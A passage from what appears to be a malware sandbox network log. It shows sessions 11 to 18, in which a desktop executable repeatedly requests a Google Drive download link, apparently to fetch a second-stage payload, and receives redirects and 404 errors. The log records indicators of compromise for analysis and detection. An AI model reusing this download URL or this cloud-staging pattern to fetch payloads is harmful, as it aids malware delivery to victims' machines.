                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.1149950142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:13 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:14 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRLB1Bf6Wbp5FM0bH_v8mp-g6dua5NPQE_sGXKc_8m4rUKAOsBii_IU2X07oAyqs4wvYVFLwH0
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:13 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce--E3SRwmpsQuIeF1zFLz4Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 64 66 57 71 49 64 58 6b 5f 6f 52 63 34 63 77 4c 66 4e 5f 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ddfWqIdXk_oRc4cwLfN_Fw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.1149959172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:14 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:15 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:15 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Es92XkzhPgPMUc8hiVwieQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.1149967142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:15 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:16 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC7JEAIPbmccGRSwlVWxNwGKC6XqexVsmKDyq-rgsnb_abHBlULabqVh6k3AmwR_RTrS
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:16 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-bUluizeK6fEkl6dlI3XOyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 47 37 41 75 71 72 79 46 73 4b 4c 64 50 52 61 59 57 6a 41 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3G7AuqryFsKLdPRaYWjAKA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.1149976172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:17 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:17 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:17 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-kJ8lW33AbP6o1pPhEowUEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.1149984142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:18 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:18 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTQHPwfdBnfp-ztXYWzOxnM-hVeXmULAkfoaZfLc1V0Q-ePf4sh-8C4f5fe4qtqryI7tZl_S_8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:18 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-Mu3T3IN1Ve0YN77zcErTHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 69 42 52 37 6c 79 36 74 4e 52 39 35 38 61 71 2d 62 65 55 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kiBR7ly6tNR958aq-beUSA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.1149990172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:19 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:19 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:19 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-SM5jJZkLMT-lW_Qj5GpJFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.1149996142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:20 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:20 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRPc2edr0MeDBTSTsYrturhPAcPn9kUJhIQjYTunpBjZ-66fhx8cClLbHVS7oV4oA_XeQyqBuY
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:20 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-5UbIlpXEUUaJdiC3T6yoyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 56 37 36 35 4f 57 77 48 6a 30 57 2d 64 49 2d 6d 64 37 78 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YV765OWwHj0W-dI-md7xuQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.1149997172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:21 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:22 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:21 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
